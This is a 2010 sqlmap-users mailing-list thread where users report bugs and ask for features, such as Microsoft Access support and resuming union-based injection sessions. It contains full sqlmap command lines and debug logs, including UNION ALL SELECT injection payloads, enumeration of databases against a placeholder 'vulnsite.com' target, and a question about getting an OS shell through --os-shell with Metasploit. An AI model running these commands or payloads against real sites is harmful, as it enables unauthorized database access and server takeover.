500 > [23:16:20] [DEBUG] got HTTP error code: 500 > [23:16:20] [WARNING] the target url is not affected by an exploitable > full inband sql injection vulnerability > [23:16:20] [INFO] confirming partial (single entry) inband sql > injection on parameter 'art' by appending a false condition after the > parameter value > [23:16:21] [DEBUG] got HTTP error code: 500 > [23:16:22] [DEBUG] got HTTP error code: 500 > [23:16:27] [DEBUG] got HTTP error code: 500 > [23:16:27] [INFO] the target url is affected by an exploitable partial > (single entry) inband sql injection vulnerability > valid union: > 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716' > > [23:16:27] [INFO] fetching database names > [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578 > [23:16:28] [DEBUG] got HTTP error code: 500 > [23:16:28] [DEBUG] performed 1 queries in 0 seconds > [23:16:28] [INFO] the SQL query provided returns 3 entries > [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 0 name FROM master..sysdatabases)-- AND 7328=7328 > [23:16:31] [DEBUG] got HTTP error code: 500 > [23:16:31] [DEBUG] performed 2 queries in 3 seconds > [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 1 name FROM master..sysdatabases)-- AND 1346=1346 > [23:16:32] [DEBUG] got HTTP error code: 500 > [23:16:32] [DEBUG] performed 3 queries in 0 seconds > [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 2 name FROM master..sysdatabases)-- AND 231=231 > [23:16:33] [DEBUG] got HTTP error code: 500 > [23:16:33] [DEBUG] performed 4 queries in 1 seconds > available databases [3]: > [*] mXX > [*] pXX > [*] tXX > > [23:16:33] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 23:16:33 > > > > > > > > > > > > The same thing happens if I send sqlmap to dump the tables (--tables). > If I do not pass --tables the first time it runs and discovers the > vulnerability, when it runs again with the resumed file, it just go > right for BLINDSQLi, taking much longer to complete the task! > > > > -- > David Gomes Guimarães > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Pagera <pag...@gm...> - 2010-03-22 12:18:47
|
hello and hope u fine when im trying --os-shell with --msf after a while is give me a message like please provide full path document root how can i know the full path ? is there any way to know the path document root full path from sqlmap? or i have to use another tool to get job done? and thank for help |
From: Alessandro T. <ale...@lo...> - 2010-03-19 09:13:35
|
The bug is human, missing quotes. Il giorno 19/mar/2010 06:31, "Brandon" <bmu...@gm...> ha scritto: I am having a problem auditing the cat param. It appears it audits the param before it but totally ignores the params after it and shuts down. C:\sqlmap8>sqlmap -u vulnsite.org/ks.php?mode=cat&cat=26 -v 1 \ -p "mode,cat" sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 01:25:31 [01:25:31] [INFO] using 'C:\sqlmap8\output\vulnsite.org\session' as session file [01:25:31] [INFO] testing connection to the target url [01:25:33] [INFO] testing if the url is stable, wait a few seconds [01:25:39] [INFO] url is stable [01:25:39] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [01:25:41] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [01:25:41] [INFO] testing if GET parameter 'mode' is dynamic [01:25:48] [WARNING] GET parameter 'mode' is not dynamic [*] shutting down at: 01:25:48 'cat' is not recognized as an internal or external command, operable program or batch file. I do the command just like in the manual and it still doesn't work ------------------------------------------------------------------------------ Download Intel® Parallel Studio Eval Try the new software tools for yourself. Speed compiling, find bugs proactively, and fine-tune applications for parallel performance. See why Intel Parallel Studio got high marks during beta. http://p.sf.net/sfu/intel-sw-dev _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-19 08:48:11
|
Yesterday we committed on subversion the very early support for Microsoft Access, we will be working on it soon. Bernardo On Fri, Mar 19, 2010 at 05:05, Brandon <bmu...@gm...> wrote: > I was wondering if you can please implement Microsoft Access? > > C:\sqlmap8>sqlmap -u http://www.vulnsite.com/forum.asp?id=11 --current-user > -v 2 > > sqlmap/0.8 - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 00:53:35 > > [00:53:35] [DEBUG] initializing the configuration > [00:53:35] [DEBUG] initializing the knowledge base > [00:53:35] [DEBUG] cleaning up configuration parameters > [00:53:35] [DEBUG] setting the HTTP timeout > [00:53:35] [DEBUG] setting the HTTP method to GET > [00:53:35] [DEBUG] creating HTTP requests opener object > [00:53:35] [DEBUG] parsing XML queries file > [00:53:35] [INFO] using 'C:\sqlmap8\output\www.vulnsite.com\session' as > session file > [00:53:35] [INFO] testing connection to the target url > [00:53:37] [INFO] testing if the url is stable, wait a few seconds > [00:53:41] [INFO] url is stable > [00:53:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic > [00:53:43] [WARNING] User-Agent parameter 'User-Agent' is not dynamic > [00:53:43] [INFO] testing if Cookie parameter 'ASPSESSIONIDASAAARCB' is > dynamic > [00:53:45] [WARNING] Cookie parameter 'ASPSESSIONIDASAAARCB' is not dynamic > [00:53:45] [INFO] testing if GET parameter 'forumid' is dynamic > [00:53:45] [DEBUG] got HTTP error code: 500 > [00:53:45] [DEBUG] setting match ratio to default value 0.900 > [00:53:45] [INFO] confirming that GET parameter 'forumid' is dynamic > [00:53:46] [DEBUG] got HTTP error code: 500 > [00:53:47] [DEBUG] got HTTP error code: 500 > [00:53:47] [INFO] GET parameter 'forumid' is dynamic > [00:53:47] [INFO] testing sql injection on GET parameter 'forumid' with 0 > parenthesis > [00:53:47] [INFO] testing unescaped numeric injection on GET parameter > 'forumid' > [00:53:49] [DEBUG] got HTTP error code: 500 > [00:53:49] [INFO] confirming unescaped numeric injection on GET parameter > 'forumid' > [00:53:50] [DEBUG] got HTTP error code: 500 > [00:53:50] [INFO] GET parameter 'forumid' is unescaped numeric injectable > with 0 parenthesis > [00:53:50] [INFO] testing for parenthesis on injectable parameter > [00:53:51] [DEBUG] got HTTP error code: 500 > [00:53:51] [DEBUG] got HTTP error code: 500 > [00:53:52] [DEBUG] got HTTP error code: 500 > [00:53:52] [INFO] the injectable parameter requires 0 parenthesis > [00:53:52] [INFO] testing MySQL > [00:53:53] [DEBUG] got HTTP error code: 500 > [00:53:53] [WARNING] the back-end DMBS is not MySQL > [00:53:53] [INFO] testing Oracle > [00:53:54] [DEBUG] got HTTP error code: 500 > [00:53:54] [WARNING] the back-end DMBS is not Oracle > [00:53:54] [INFO] testing PostgreSQL > [00:53:54] [DEBUG] got HTTP error code: 500 > [00:53:54] [WARNING] the back-end DMBS is not PostgreSQL > [00:53:54] [INFO] testing Microsoft SQL Server > [00:53:55] [DEBUG] got HTTP error code: 500 > [00:53:55] [WARNING] the back-end DMBS is not Microsoft SQL Server > [00:53:55] [ERROR] sqlmap was not able to fingerprint the back-end database > management system, > but from the HTML error page it was possible to determinate that > the back-end DBMS is Microsoft Access. Support for this DBMS will be > implemented > if you ask, just drop us an email > > [*] shutting down at: 00:53:55 > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Brandon <bmu...@gm...> - 2010-03-19 05:30:37
|
I am having a problem auditing the cat param. It appears it audits the param before it but totally ignores the params after it and shuts down. C:\sqlmap8>sqlmap -u vulnsite.org/ks.php?mode=cat&cat=26 -v 1 \ -p "mode,cat" sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 01:25:31 [01:25:31] [INFO] using 'C:\sqlmap8\output\vulnsite.org\session' as session file [01:25:31] [INFO] testing connection to the target url [01:25:33] [INFO] testing if the url is stable, wait a few seconds [01:25:39] [INFO] url is stable [01:25:39] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [01:25:41] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [01:25:41] [INFO] testing if GET parameter 'mode' is dynamic [01:25:48] [WARNING] GET parameter 'mode' is not dynamic [*] shutting down at: 01:25:48 'cat' is not recognized as an internal or external command, operable program or batch file. I do the command just like in the manual and it still doesn't work |
From: Brandon <bmu...@gm...> - 2010-03-19 05:05:44
|
I was wondering if you can please implement Microsoft Access? C:\sqlmap8>sqlmap -u http://www.vulnsite.com/forum.asp?id=11 --current-user -v 2 sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 00:53:35 [00:53:35] [DEBUG] initializing the configuration [00:53:35] [DEBUG] initializing the knowledge base [00:53:35] [DEBUG] cleaning up configuration parameters [00:53:35] [DEBUG] setting the HTTP timeout [00:53:35] [DEBUG] setting the HTTP method to GET [00:53:35] [DEBUG] creating HTTP requests opener object [00:53:35] [DEBUG] parsing XML queries file [00:53:35] [INFO] using 'C:\sqlmap8\output\www.vulnsite.com\session' as session file [00:53:35] [INFO] testing connection to the target url [00:53:37] [INFO] testing if the url is stable, wait a few seconds [00:53:41] [INFO] url is stable [00:53:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [00:53:43] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [00:53:43] [INFO] testing if Cookie parameter 'ASPSESSIONIDASAAARCB' is dynamic [00:53:45] [WARNING] Cookie parameter 'ASPSESSIONIDASAAARCB' is not dynamic [00:53:45] [INFO] testing if GET parameter 'forumid' is dynamic [00:53:45] [DEBUG] got HTTP error code: 500 [00:53:45] [DEBUG] setting match ratio to default value 0.900 [00:53:45] [INFO] confirming that GET parameter 'forumid' is dynamic [00:53:46] [DEBUG] got HTTP error code: 500 [00:53:47] [DEBUG] got HTTP error code: 500 [00:53:47] [INFO] GET parameter 'forumid' is dynamic [00:53:47] [INFO] testing sql injection on GET parameter 'forumid' with 0 parenthesis [00:53:47] [INFO] testing unescaped numeric injection on GET parameter 'forumid' [00:53:49] [DEBUG] got HTTP error code: 500 [00:53:49] [INFO] confirming unescaped numeric injection on GET parameter 'forumid' [00:53:50] [DEBUG] got HTTP error code: 500 [00:53:50] [INFO] GET parameter 'forumid' is unescaped numeric injectable with 0 parenthesis [00:53:50] [INFO] testing for parenthesis on injectable parameter [00:53:51] [DEBUG] got HTTP error code: 500 [00:53:51] [DEBUG] got HTTP error code: 500 [00:53:52] [DEBUG] got HTTP error code: 500 [00:53:52] [INFO] the injectable parameter requires 0 parenthesis [00:53:52] [INFO] testing MySQL [00:53:53] [DEBUG] got HTTP error code: 500 [00:53:53] [WARNING] the back-end DMBS is not MySQL [00:53:53] [INFO] testing Oracle [00:53:54] [DEBUG] got HTTP error code: 500 [00:53:54] [WARNING] the back-end DMBS is not Oracle [00:53:54] [INFO] testing PostgreSQL [00:53:54] [DEBUG] got HTTP error code: 500 [00:53:54] [WARNING] the back-end DMBS is not PostgreSQL [00:53:54] [INFO] testing Microsoft SQL Server [00:53:55] [DEBUG] got HTTP error code: 500 [00:53:55] [WARNING] the back-end DMBS is not Microsoft SQL Server [00:53:55] [ERROR] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Support for this DBMS will be implemented if you ask, just drop us an email [*] shutting down at: 00:53:55 |
From: David G. <sk...@gm...> - 2010-03-19 02:52:58
|
The problem happens because when sqlmap perform the resume of the UNIONSQLi session, sqlmap does not check if he already have the amount of dbs, tables or columns before attempting to retrieve through UNIONSQLi their names. On Thu, Mar 18, 2010 at 11:23 PM, David Guimaraes <sk...@gm...> wrote: > # svn info > Path: . > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap > Repository Root: https://svn.sqlmap.org/sqlmap > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb > Revision: 1497 > Node Kind: directory > Schedule: normal > Last Changed Author: inquisb > Last Changed Rev: 1497 > Last Changed Date: 2010-03-18 14:36:58 -0300 (Thu, 18 Mar 2010) > > > On Thu, Mar 18, 2010 at 11:22 PM, David Guimaraes <sk...@gm...> wrote: >> When I try to run the sqlmap this way: >> >> # ./sqlmap.py --threads 20 -v 2 --union-use -u >> "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021" >> -p art --string WRAPED >> >> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 22:53:24 >> >> [22:53:24] [DEBUG] initializing the configuration >> [22:53:24] [DEBUG] initializing the knowledge base >> [22:53:24] [DEBUG] cleaning up configuration parameters >> [22:53:24] [DEBUG] setting the HTTP timeout >> [22:53:24] [DEBUG] setting the HTTP method to GET >> [22:53:24] [DEBUG] creating HTTP requests opener object >> [22:53:24] [DEBUG] parsing XML queries file >> [22:53:24] [INFO] using >> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session >> file >> [22:53:24] [INFO] testing connection to the target url >> [22:53:25] [INFO] testing if the provided string is within the target >> URL page content >> [22:53:29] [WARNING] the testable parameter 'art' you provided is not >> into the Cookie >> [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0 >> parenthesis >> [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art' >> [22:53:29] [DEBUG] got HTTP error code: 500 >> [22:53:30] [DEBUG] got HTTP error code: 500 >> [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art' >> [22:53:30] [DEBUG] got HTTP error code: 500 >> [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable >> with 0 parenthesis >> [22:53:30] [INFO] testing for parenthesis on injectable parameter >> [22:53:31] [DEBUG] got HTTP error code: 500 >> [22:53:31] [DEBUG] got HTTP error code: 500 >> [22:53:32] [DEBUG] got HTTP error code: 500 >> [22:53:32] [INFO] the injectable parameter requires 0 parenthesis >> [22:53:32] [INFO] testing MySQL >> [22:53:32] [DEBUG] got HTTP error code: 500 >> [22:53:32] [WARNING] the back-end DMBS is not MySQL >> [22:53:32] [INFO] testing Oracle >> [22:53:33] [DEBUG] got HTTP error code: 500 >> [22:53:33] [WARNING] the back-end DMBS is not Oracle >> [22:53:33] [INFO] testing PostgreSQL >> [22:53:33] [DEBUG] got HTTP error code: 500 >> [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL >> [22:53:33] [INFO] testing Microsoft SQL Server >> [22:53:34] [DEBUG] got HTTP error code: 500 >> [22:53:34] [INFO] confirming Microsoft SQL Server >> [22:53:35] [DEBUG] got HTTP error code: 500 >> [22:53:35] [DEBUG] got HTTP error code: 500 >> [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server >> web server operating system: Windows 2000 >> web application technology: ASP.NET, Microsoft IIS 6.0, ASP >> back-end DBMS: Microsoft SQL Server 2005 >> >> [22:53:35] [INFO] testing inband sql injection on parameter 'art' with >> NULL bruteforcing technique >> [22:53:39] [DEBUG] got HTTP error code: 500 >> [22:53:39] [DEBUG] got HTTP error code: 500 >> [22:53:40] [DEBUG] got HTTP error code: 500 >> [22:53:40] [DEBUG] got HTTP error code: 500 >> [22:53:44] [DEBUG] got HTTP error code: 500 >> [22:53:44] [DEBUG] got HTTP error code: 500 >> [22:53:44] [INFO] confirming full inband sql injection on parameter 'art' >> [22:53:45] [DEBUG] got HTTP error code: 500 >> [22:53:45] [DEBUG] got HTTP error code: 500 >> [22:53:46] [DEBUG] got HTTP error code: 500 >> [22:53:46] [DEBUG] got HTTP error code: 500 >> [22:53:47] [DEBUG] got HTTP error code: 500 >> [22:53:47] [DEBUG] got HTTP error code: 500 >> [22:53:47] [WARNING] the target url is not affected by an exploitable >> full inband sql injection vulnerability >> [22:53:47] [INFO] confirming partial (single entry) inband sql >> injection on parameter 'art' by appending a false condition after the >> parameter value >> [22:53:48] [DEBUG] got HTTP error code: 500 >> [22:53:49] [DEBUG] got HTTP error code: 500 >> [22:53:49] [DEBUG] got HTTP error code: 500 >> [22:53:49] [INFO] the target url is affected by an exploitable partial >> (single entry) inband sql injection vulnerability >> valid union: >> 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410' >> >> [22:53:49] [INFO] Fetched data logged to text files under >> '/pentest/database/sqlmap8/output/www.vulnsite.com' >> >> [*] shutting down at: 22:53:49 >> >> >> >> >> >> >> >> >> >> >> He notes correctly UNIONSQLi and ends OK. Soon after that, I try to >> recover the database by including only the argument "--dbs" and he can >> not recover in advance with the UNIONSQLi strange reason described >> below and to the BLINDSQLi. He tries to find the right table name >> without first knowing how many there really are through the use of the >> UNIONSQLi and direct try to find out how many there are and their >> names using the BLINDSQLi. >> >> Example with resume: >> >> # ./sqlmap.py --threads 20 -v 2 --union-use -u >> "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" >> -p art --string WRAPED --dbs >> >> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 22:54:40 >> >> [22:54:40] [DEBUG] initializing the configuration >> [22:54:40] [DEBUG] initializing the knowledge base >> [22:54:40] [DEBUG] cleaning up configuration parameters >> [22:54:40] [DEBUG] setting the HTTP timeout >> [22:54:40] [DEBUG] setting the HTTP method to GET >> [22:54:40] [DEBUG] creating HTTP requests opener object >> [22:54:40] [DEBUG] parsing XML queries file >> [22:54:40] [INFO] using >> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session >> file >> [22:54:40] [INFO] resuming string match 'WRAPED' from session file >> [22:54:40] [INFO] resuming injection point 'GET' from session file >> [22:54:40] [INFO] resuming injection parameter 'art' from session file >> [22:54:40] [INFO] resuming injection type 'numeric' from session file >> [22:54:40] [INFO] resuming 0 number of parenthesis from session file >> [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005' >> from session file >> [22:54:40] [INFO] resuming union comment '--' from session file >> [22:54:40] [INFO] resuming union count 6 from session file >> [22:54:40] [INFO] resuming union position 2 from session file >> [22:54:40] [INFO] testing connection to the target url >> [22:54:43] [WARNING] the testable parameter 'art' you provided is not >> into the Cookie >> [22:54:43] [INFO] testing for parenthesis on injectable parameter >> [22:54:43] [DEBUG] skipping test for MySQL >> [22:54:43] [DEBUG] skipping test for Oracle >> [22:54:43] [DEBUG] skipping test for PostgreSQL >> [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server >> web server operating system: Windows 2000 >> web application technology: ASP.NET, Microsoft IIS 6.0, ASP >> back-end DBMS: Microsoft SQL Server 2005 >> >> [22:54:43] [INFO] fetching database names >> [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), >> NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796 >> [22:54:44] [DEBUG] got HTTP error code: 500 >> [22:54:45] [WARNING] for some reasons it was not possible to retrieve >> the query output through inband SQL injection technique, sqlmap is >> going blind >> [22:54:45] [INFO] fetching number of databases >> [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) >> AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases >> [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500 >> [22:54:48] [DEBUG] got HTTP error code: 500 >> . >> . >> . >> [23:12:13] [DEBUG] performed 42 queries in 16 seconds >> available databases [3]: >> [*] mXX >> [*] pXX >> [*] tXX >> >> [23:12:13] [INFO] Fetched data logged to text files under >> '/pentest/database/sqlmap8/output/www.vulnsite.com' >> >> [*] shutting down at: 23:12:13 >> >> >> >> >> >> >> >> >> >> >> >> But if I delete the session and send the sqlmap start over with the >> "--dbs" activated, it correctly retrieves how many databases and their >> names using the correct technique (UNIONSQLi). >> >> Example without resume (using --dbs first time): >> # rm -rf output/* >> # ./sqlmap.py --threads 20 -v 2 --union-use -u >> "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" >> -p art --string WRAPED --dbs >> >> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 23:16:02 >> >> [23:16:02] [DEBUG] initializing the configuration >> [23:16:02] [DEBUG] initializing the knowledge base >> [23:16:02] [DEBUG] cleaning up configuration parameters >> [23:16:02] [DEBUG] setting the HTTP timeout >> [23:16:02] [DEBUG] setting the HTTP method to GET >> [23:16:02] [DEBUG] creating HTTP requests opener object >> [23:16:02] [DEBUG] parsing XML queries file >> [23:16:02] [INFO] using >> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session >> file >> [23:16:02] [INFO] testing connection to the target url >> [23:16:02] [INFO] testing if the provided string is within the target >> URL page content >> [23:16:03] [WARNING] the testable parameter 'art' you provided is not >> into the Cookie >> [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 >> parenthesis >> [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art' >> [23:16:04] [DEBUG] got HTTP error code: 500 >> [23:16:04] [DEBUG] got HTTP error code: 500 >> [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art' >> [23:16:05] [DEBUG] got HTTP error code: 500 >> [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable >> with 0 parenthesis >> [23:16:05] [INFO] testing for parenthesis on injectable parameter >> [23:16:05] [DEBUG] got HTTP error code: 500 >> [23:16:05] [DEBUG] got HTTP error code: 500 >> [23:16:06] [DEBUG] got HTTP error code: 500 >> [23:16:06] [INFO] the injectable parameter requires 0 parenthesis >> [23:16:06] [INFO] testing MySQL >> [23:16:06] [DEBUG] got HTTP error code: 500 >> [23:16:06] [WARNING] the back-end DMBS is not MySQL >> [23:16:06] [INFO] testing Oracle >> [23:16:07] [DEBUG] got HTTP error code: 500 >> [23:16:07] [WARNING] the back-end DMBS is not Oracle >> [23:16:07] [INFO] testing PostgreSQL >> [23:16:07] [DEBUG] got HTTP error code: 500 >> [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL >> [23:16:07] [INFO] testing Microsoft SQL Server >> [23:16:08] [DEBUG] got HTTP error code: 500 >> [23:16:08] [INFO] confirming Microsoft SQL Server >> [23:16:14] [DEBUG] got HTTP error code: 500 >> [23:16:15] [DEBUG] got HTTP error code: 500 >> [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server >> web server operating system: Windows 2000 >> web application technology: ASP.NET, Microsoft IIS 6.0, ASP >> back-end DBMS: Microsoft SQL Server 2005 >> >> [23:16:15] [INFO] testing inband sql injection on parameter 'art' with >> NULL bruteforcing technique >> [23:16:15] [DEBUG] got HTTP error code: 500 >> [23:16:15] [DEBUG] got HTTP error code: 500 >> [23:16:16] [DEBUG] got HTTP error code: 500 >> [23:16:16] [DEBUG] got HTTP error code: 500 >> [23:16:16] [DEBUG] got HTTP error code: 500 >> [23:16:17] [DEBUG] got HTTP error code: 500 >> [23:16:17] [INFO] confirming full inband sql injection on parameter 'art' >> [23:16:17] [DEBUG] got HTTP error code: 500 >> [23:16:18] [DEBUG] got HTTP error code: 500 >> [23:16:18] [DEBUG] got HTTP error code: 500 >> [23:16:19] [DEBUG] got HTTP error code: 500 >> [23:16:19] [DEBUG] got HTTP error code: 500 >> [23:16:20] [DEBUG] got HTTP error code: 500 >> [23:16:20] [WARNING] the target url is not affected by an exploitable >> full inband sql injection vulnerability >> [23:16:20] [INFO] confirming partial (single entry) inband sql >> injection on parameter 'art' by appending a false condition after the >> parameter value >> [23:16:21] [DEBUG] got HTTP error code: 500 >> [23:16:22] [DEBUG] got HTTP error code: 500 >> [23:16:27] [DEBUG] got HTTP error code: 500 >> [23:16:27] [INFO] the target url is affected by an exploitable partial >> (single entry) inband sql injection vulnerability >> valid union: >> 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716' >> >> [23:16:27] [INFO] fetching database names >> [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), >> NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578 >> [23:16:28] [DEBUG] got HTTP error code: 500 >> [23:16:28] [DEBUG] performed 1 queries in 0 seconds >> [23:16:28] [INFO] the SQL query provided returns 3 entries >> [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), >> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT >> TOP 0 name FROM master..sysdatabases)-- AND 7328=7328 >> [23:16:31] [DEBUG] got HTTP error code: 500 >> [23:16:31] [DEBUG] performed 2 queries in 3 seconds >> [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), >> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT >> TOP 1 name FROM master..sysdatabases)-- AND 1346=1346 >> [23:16:32] [DEBUG] got HTTP error code: 500 >> [23:16:32] [DEBUG] performed 3 queries in 0 seconds >> [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, >> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name >> AS VARCHAR(8000)), >> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), >> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT >> TOP 2 name FROM master..sysdatabases)-- AND 231=231 >> [23:16:33] [DEBUG] got HTTP error code: 500 >> [23:16:33] [DEBUG] performed 4 queries in 1 seconds >> available databases [3]: >> [*] mXX >> [*] pXX >> [*] tXX >> >> [23:16:33] [INFO] Fetched data logged to text files under >> '/pentest/database/sqlmap8/output/www.vulnsite.com' >> >> [*] shutting down at: 23:16:33 >> >> >> >> >> >> >> >> >> >> >> >> The same thing happens if I send sqlmap to dump the tables (--tables). >> If I do not pass --tables the first time it runs and discovers the >> vulnerability, when it runs again with the resumed file, it just go >> right for BLINDSQLi, taking much longer to complete the task! >> >> >> >> -- >> David Gomes Guimarães >> > > > > -- > David Gomes Guimarães > -- David Gomes Guimarães |
From: David G. <sk...@gm...> - 2010-03-19 02:24:20
|
